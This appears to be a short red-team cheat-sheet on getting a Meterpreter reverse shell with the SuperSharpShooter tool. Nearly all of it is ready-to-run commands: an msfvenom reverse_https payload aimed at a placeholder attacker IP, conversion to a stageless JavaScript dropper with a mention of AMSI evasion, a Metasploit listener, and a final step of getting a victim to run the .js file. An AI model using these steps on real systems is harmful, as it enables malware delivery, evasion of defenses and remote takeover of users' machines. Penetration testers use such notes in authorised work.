Meterpreter with SuperSharpShooter
1) Download SuperSharpShooter project
git clone https://github.com/ScriptIdiot/SuperSharpShooter2) Craft payload
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=[ATTACKER_IP] LPORT=[PORT] -f raw -o shell.txt3) Run the tool to obtain the .js code, other options like AMSI evasion are available in the documentation of the GitHub
./SuperSharpShooter.py --stageless --dotnetver 4 --rawscfile shell.txt --payload js --output payload4) Start listener
sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost [ATTACKR_IP]; set lport [PORT]; exploit"5) Find a way to deliver the .js file to the user and that he executes it, then you should get your reverse shell.
Last updated